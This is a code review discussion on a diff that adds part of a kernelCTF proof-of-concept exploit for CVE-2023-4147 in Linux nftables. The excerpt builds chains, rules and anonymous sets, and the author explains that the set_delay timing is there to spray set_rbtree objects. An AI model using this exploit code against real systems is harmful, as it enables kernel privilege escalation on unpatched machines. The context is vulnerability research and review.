pocs/linux/kernelctf/CVE-2023-4147_mitigation/exploit/mitigation-6.1/exploit.c

```diff
@@ -0,0 +1,996 @@
+        nftnl_rule_set_str(rules_bind_victim_victim2[i], NFTNL_RULE_CHAIN, chain_victim_name);
+
+        expr_immediate = nftnl_expr_alloc("immediate");
+        nftnl_expr_set_u32(expr_immediate, NFTNL_EXPR_IMM_DREG, NFT_REG_VERDICT);
+        nftnl_expr_set_u32(expr_immediate, NFTNL_EXPR_IMM_VERDICT, NFT_GOTO);
+        nftnl_expr_set_str(expr_immediate, NFTNL_EXPR_IMM_CHAIN, chain_victim2_name);
+
+        nftnl_rule_add_expr(rules_bind_victim_victim2[i], expr_immediate);
+
+        for(int j = 0 ; j < 12; j++){
+            expr_counter = nftnl_expr_alloc("counter");
+            nftnl_rule_add_expr(rules_bind_victim_victim2[i], expr_counter);
+        }
+
+        rules_victim2[i] = nftnl_rule_alloc();
+
+        memset(rule_data, 'b', 0x100);
+
+        nftnl_rule_set_str(rules_victim2[i], NFTNL_RULE_TABLE, table2_name);
+        nftnl_rule_set_str(rules_victim2[i], NFTNL_RULE_CHAIN, chain_victim2_name);
+        nftnl_rule_set_data(rules_victim2[i], NFTNL_RULE_USERDATA, rule_data, 192-25);
+    }
+
+    struct nftnl_rule * rule_target = nftnl_rule_alloc();
+
+    nftnl_rule_set_str(rule_target, NFTNL_RULE_TABLE, table3_name);
+    nftnl_rule_set_str(rule_target, NFTNL_RULE_CHAIN, chain_target_name);
+    nftnl_rule_set_data(rule_target, NFTNL_RULE_USERDATA, rule_data, 192-25-24);
+
+    expr_counter = nftnl_expr_alloc("counter");
+    nftnl_rule_add_expr(rule_target, expr_counter);
+
+    struct nftnl_rule * rule_target_del = nftnl_rule_alloc();
+
+    nftnl_rule_set_str(rule_target_del, NFTNL_RULE_TABLE, table3_name);
+    nftnl_rule_set_str(rule_target_del, NFTNL_RULE_CHAIN, chain_target_name);
+
+    struct nftnl_rule * rule_bind_chain_1_2_del = nftnl_rule_alloc();
+
+    nftnl_rule_set_str(rule_bind_chain_1_2_del, NFTNL_RULE_TABLE, table1_name);
+    nftnl_rule_set_str(rule_bind_chain_1_2_del, NFTNL_RULE_CHAIN, chain1_name);
+    nftnl_rule_set_u64(rule_bind_chain_1_2_del, NFTNL_RULE_HANDLE, 5);
+
+    struct nftnl_set * set_delay =  nftnl_set_alloc();
+    nftnl_set_set_str(set_delay, NFTNL_SET_TABLE, table1_name);
+    nftnl_set_set_str(set_delay, NFTNL_SET_NAME, set_delay_name);
+    nftnl_set_set_u32(set_delay, NFTNL_SET_FLAGS, NFT_SET_ANONYMOUS);
+    nftnl_set_set_u32(set_delay, NFTNL_SET_KEY_LEN, 4);
+    nftnl_set_set_u32(set_delay, NFTNL_SET_ID, 1338);
+
+    struct nftnl_set * set_delay_elems[SET_DELAY_ELEM];
+    struct nftnl_set_elem * delay_elem;
+
+    memset(key_data, 0, 0x100);
+
+    for(int i = 0; i < SET_DELAY_ELEM; i++){
+        set_delay_elems[i] = nftnl_set_alloc();
+
+        nftnl_set_set_str(set_delay_elems[i], NFTNL_SET_TABLE, table1_name);
+        nftnl_set_set_str(set_delay_elems[i], NFTNL_SET_NAME, set_delay_name);
+
+        delay_elem = nftnl_set_elem_alloc();
+
+        key_data[0]++;
+
+        nftnl_set_elem_set(delay_elem, NFTNL_SET_ELEM_KEY, &key_data, 4);
+        nftnl_set_elem_add(set_delay_elems[i], delay_elem);
+    }
+
+    struct nftnl_set * set_delay_del =  nftnl_set_alloc();
```

Comment:
Could you comment why do we need to have `set_delay_del` part here? In PR#112 COS exploit we don't do this operation.

Reply:
I created the set_delay to create a delay between rule destroy and set element destroy to spray the set_rbtree. I added a comment to the exploit.c.

Reply:
Perfect. Thanks